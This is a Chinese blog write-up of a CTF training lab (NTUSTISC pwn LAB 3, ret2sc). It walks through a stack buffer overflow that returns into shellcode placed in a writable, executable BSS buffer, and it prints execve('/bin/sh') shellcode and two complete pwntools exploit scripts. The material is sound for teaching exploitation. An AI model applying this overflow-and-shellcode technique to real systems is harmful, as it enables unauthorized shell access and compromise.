NTUSTISC pwn LAB 3栈溢出

最新推荐文章于 2023-06-20 08:00:00 发布
最新推荐文章于 2023-06-20 08:00:00 发布
阅读量304 收藏 2
点赞数
分类专栏: Pwn 栈溢出 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44867432/article/details/121999435
版权

NTUSTISC pwn LAB 3栈溢出:

1、检查保护

保护机制

2、程序分析

1)静态分析

IDA查看反汇编代码发现read函数,buf显然可以产生栈溢出,但是没有看到message的大小。通过ALT+T快捷键搜索关键词message,发现其在.bss段开启了一块0x8F-0x60+1=0x30的空间,即使填入很长的数据,message依然不能利用栈溢出。也没有在IDA中看到自定义的函数以及一些关键性的“/bin/sh”等可利用的关键字符串出现,但查看保护措施时Has RWX segments提示有可读可写可执行的BSS段,因此考虑向BSS段中写入shellcode,即向message中写入shellcode。

IDA反编译

2)动态分析

执行此题目,2次提示输入信息。

程序执行

3、漏洞利用

(1)利用思路

由于反汇编代码中没有找到可利用的如execve,system,/bin/sh等关键字,且向栈中的message数组输入超长数据仍然无法利用栈溢出,检查程序保护措施时发现其有可读可写可执行的段,而程序恰好定义了一个长度为0x30大小的message数组,通过向message数组中输入shellcode,使用buf数组进行栈溢出覆盖掉return address使其指向message数组的地址,RWX使得shellcde能够执行即可获取shell。

(2)利用过程

1)shellcode生成
mov     rbx, 0x68732f6e69622f
push    rbx
mov     rdi, rsp
xor     rsi, rsi
xor     rdx, rdx
mov     rax, 0x3b
syscall

shellcode主要是填入/bin/sh参数,执行系统调用execve:

int execve(const char *filename, char *const argv[], char *const envp[])

以小端存储的0x68732f6e69622f表示/bin/sh,将该字符串push到堆栈中,此时rsp指向栈顶地址,rsp中存的是/bin/sh的真实地址,将rsp赋值给rdi,第二个参数rsi和第三个参数rdx分别用异或置为0,execve为59号系统调用,即0x3b;

或使用自动生成shellcode;

sc = asm(shellcraft.sh())
2)message地址获取

IDA: 0x601060

BSS段Message

objdump:objdump -d -M Inter ret2sc

objdump

3)栈溢出长度计算

使用gdb调试或直接计算:0xc0-0xb0=16,再加上return address,覆盖长度为24,之后填入message的地址即可跳到bss段上去执行。

偏移量计算

4)exp编写

context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说设置context如下:

context(os='linux', arch='amd64', log_level='debug')

这句话的意思是:

\1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
\2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
\3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。

exp代码:

  1 from pwn import *                                                                             
  2 context.arch = 'amd64'
  3 p = process("./ret2sc")
  4 shellcode=asm('''
  5 mov rbx,0x68732f6e69622f
  6 push rbx
  7 mov rdi,rsp
  8 xor rsi,rsi
  9 xor rdx,rdx
 10 mov rax,0x3b
 11 syscall''')
 12 message_addr = 0x601060
 13 payload = b'A'*0x18+p64(message_addr)
 14 p.recvuntil(": ")
 15 p.send(shellcode)
 16 p.recvuntil(": ")
 17 p.send(payload)
 18 p.interactive()

执行结果

  1 from pwn import *                                                                             
  2 context(os='linux', arch='amd64', log_level='debug')
  3 p = process("./ret2sc")
  4 shellcode=asm(shellcraft.sh())
  5 print(shellcode)
  6 message_addr = 0x601060
  7 payload = b'A'*0x18+p64(message_addr)
  8 p.recvuntil(": ")
  9 p.send(shellcode)
 10 p.recvuntil(": ")
 11 p.send(payload)
 12 p.interactive()

Debug信息:
Debug信息

4、动态验证

gdb调试跟踪执行过程,执行到第二个read函数进入,逐步跟踪汇编指令的执行,此时还未执行到syscall。

请添加图片描述

查看寄存器状态,相关寄存器都已经存入了相应的值。

请添加图片描述

继续进行下一步调试,显示执行了一个新程序。

请添加图片描述

同时exp脚本得到了shell。

请添加图片描述

Always5572
关注
专栏目录
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
CTF中的PWN——无安全防护(栈溢出
壊壊的诱惑你的博客
09-20 2571
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
NTUSTISC(台科大資訊安全研究社)pwn bof
carol2358的博客
04-03 781
题目来自:https://isc.taiwan-te.ch/scoreboard/ 记录一下pwn题 bof, 初始pwn栈溢出,覆盖返回地址就可以 根据function prologue: push rbp mov rbp, rsp sub rsp, 0x10 得出偏移地址0x18 用 objdump -d bof 得出跳转位置 0x0000000000400607 然后写exp:...
pwn入门2
九层台
03-28 444
bof 首先输入2个网址,得到了一个源代码一个elf文件 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overfl...
linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客
weixin_39611389的博客
05-16 924
摘要本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介。0x01 前言经过前面的几篇文章我们大概以及了解了基本的栈溢出漏洞的利用方式,那今天就来个进阶版。有时候我们在打CTF的时候需要的是获取系统shell,然后通过shell去拿到flag,那么我们该怎么通过溢出漏洞来拿到服务器...
stm32 栈溢检测c语言,栈溢出检查机制
weixin_34546240的博客
05-26 1850
分享一种栈溢出检查机制(硬件),适用于所有cm3芯片,只需对现有工程作四步修改分享一种栈溢出检查机制(硬件),适用于所有cm3芯片,只需对现有工程作四步修改一.需求1.造成主栈(MSP)溢出的原因有很多,如过多的定义局部变量,递归调用,中断嵌套等都有可能会导致主栈溢出。2.主栈溢出后会对其他内存空间做恶意修改,导致不可预料的后果3.stm32不具备MPU,没有对内存进行保护的硬件机制4.软件检测栈...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
PWN入门之栈迁移-附件资源
03-02
PWN入门之栈迁移-附件资源
栈溢出 (1).pdf
09-30
栈溢出是计算机安全领域中的一种常见的漏洞,它发生在程序尝试向栈上的变量写入比分配给该变量的字节还要多的数据时。这种漏洞允许攻击者控制程序的执行流程,进而可能获取系统的控制权。Pwn是黑客的俚语,通常用于...
栈溢出基础——ROP1.0的例题
07-13
栈溢出基础——ROP1.0的例题 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
其它栈溢出技巧
听鬼哥说故事
08-29 5966
其它栈溢出技巧
[NTUSTISC pwn LAB 4]gothijacking
qq_44867432的博客
12-19 471
[NTUSTISC pwn LAB 4]gothijacking 1、检查保护 开启了Canary栈溢出保护,同时有可读可写可执行的段,got表可写入。 2、程序分析 (1)静态分析 一般带canary的栈保护措施都会向栈中写入一串随机数,然后执行完某个步骤进行随机数比对,若相同则继续执行,若不同则退出程序。通过观察反汇编代码,输出what’s your name后需要向name所在地址中输入0x40长度的数据。name在bss段的长度为:0xBF-0X80+1=64。通过检查保护措施看到有RWX的段,是
C/C++ 通用ShellCode的编写与调用
热门推荐
CSDN
09-23 1万+
首先,我们的ShellCode代码需要自定位,因为我们的代码并不是一个完整的EXE可执行程序,他没有导入表无法定位到当前系统中每个函数的虚拟地址,所以我们直接获取到Kernel32.dll的基地址,里面的GetProcAddr这个函数,获取的方式有很多,第一种是暴力搜索,第二种通过遍历进程的TEB结构来实现,我们使用第二种方式尝试,一旦获取到该函数,就可以动态的调用任何想要的函数了。
简单的PWN栈溢出的尝试
weixin_48421613的博客
06-20 559
这是一道2018年的PWN的简单试题
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3225
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
PWN bof [pwnable.kr]CTF writeup题解系列3
重新启程
01-01 847
题目地址:http://pwnable.kr/play.php 先看看图标,挺有意思的小动物! 继续看题目内容: 下载相应的文件 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/bof.c --2020-01-01 08:40:45-- http://pwnable.kr/bin/bof.c Resolv...
PWN学习003 bof
05-10 158
先看程序 下载相应代码和程序。 查看源码。 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key) { char overflowme[32]; printf("overflow me...
动态定位API函数之shellcode编写
mdp1234的博客
11-28 1084
通用shellcode编写动态定位API 背景: 如果编写的 ShellCode 采用了硬编址的方式来调用相应的API函数,这会存在操作系统的版本不一样,调用函数在内存中的地址不同而出现失败的现象。如下图在win10中就不能正常运行 这时需要通过编写一些定位程序,让 ShellCode 能够动态定位所需要的API函数地址,从中解决ShellCode 的通用性问题。 1.上述弹窗程序中最重要的函数MessageBox,它是位于 User32.dll 这个动态链接库里,默认情况下是无法直接调用的,为了能够调用
格式化字符串任意地址写入、函数指针执行shellcode——攻防世界string复现及知识点简述
独沐晨霖
08-24 1138
文章目录原题复现——攻防世界string漏洞分析攻击思路exp要注意的小细节 原题复现——攻防世界string 漏洞分析 题目去除了符号表,简单分析即可还原函数功能,用ida改名即可 先进行基础检查,是64位程序,未开启PIE main函数中会给出v3[0]和v3[1]的地址 游戏开始需要输入角色名称,无利用点 go_east函数,没有可以利用的地方,必须输east才能继续游戏 许愿函数,读入用户输入地址以及format,可以结合main函数给我们的地址进行任意地址写利用 .
pwn+栈溢出解题思路
最新发布
11-10
栈溢出是一种常见的漏洞,攻击者可以通过利用栈溢出漏洞来执行恶意代码。pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如栈随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值